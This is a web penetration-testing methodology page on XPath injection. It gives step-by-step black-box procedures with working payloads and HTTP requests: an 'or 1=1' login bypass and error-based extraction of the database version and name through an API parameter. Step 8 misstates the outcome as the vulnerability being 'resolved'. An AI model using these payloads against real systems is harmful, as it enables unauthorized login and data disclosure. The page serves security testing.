search

XPath Injection

hashtag
Check List

hashtag
Methodology

hashtag
Black Box

hashtag
Bypass Authentication via XPath Injection

1

Log in to the target site and complete the authentication process on the site

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

UserName=testuser&Password=test
2

Then, using Burp Suite, intercept the authentication requests and verify that the application is using an XML document to store user information.

3

Fill in the username and password entries on the authentication page Submit the request and track the submitted request

4

Then, in the intercepted request, check whether the parameters sent in the request are in the form of an XPATH structure like

[UserName/text()='" & Request("UserName") & "' And Password/text()='" & Request("Password") & "']
5

Enter a valid value in the password field (test)

6

In the username field, inject the following malicious payload

test' or 1=1 or 'a'='a

The payload has been injected

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

UserName=test' or 1=1 or 'a'='a&Password=test
7

Submit the login request and Observe that the XPath query is modified as follows

[UserName/text()='test' or 1=1 or 'a'='a' And Password/text()='test']
8

If the injected condition 1=1 is true and the authentication is successful, the vulnerability is resolved

hashtag
XPath Injection via product API

1

Log into the target site and intercept the requests using burp suite

2

Then look for APIs for products that have database-like parameters, such as the getcolumns parameter

GET /api/product.php?parent_callid=[VALUE]&callid=[VALUE]&getcolumns=
3

Send a normal request to confirm the endpoint responds successfully without any errors

4

Modify the getcolumns parameter by injecting the following payload to trigger an XPath error-based SQL injection

extractvalue(1,concat(0x7e,version()))
5

Send the following HTTP request

GET /api/product.php?parent_callid=mobile&callid=123&getcolumns=extractvalue(1,concat(0x7e,version()))
6

Observe that the server returns an error message containing the database version in the XPath syntax error response

7

Modify the getcolumns parameter again using the following payload to extract the current database name

updatexml(1,concat(0x7e,database()),1)
8

Send the following HTTP request

GET /api/product.php?parent_callid=mobile&callid=123&getcolumns=updatexml(1,concat(0x7e,database()),1)
9

Observe that the server returns an XPath syntax error message disclosing the current database name

hashtag
White Box

hashtag
Cheat Sheet

PreviousSSI InjectionNextIMAP SMTP Injection

Last updated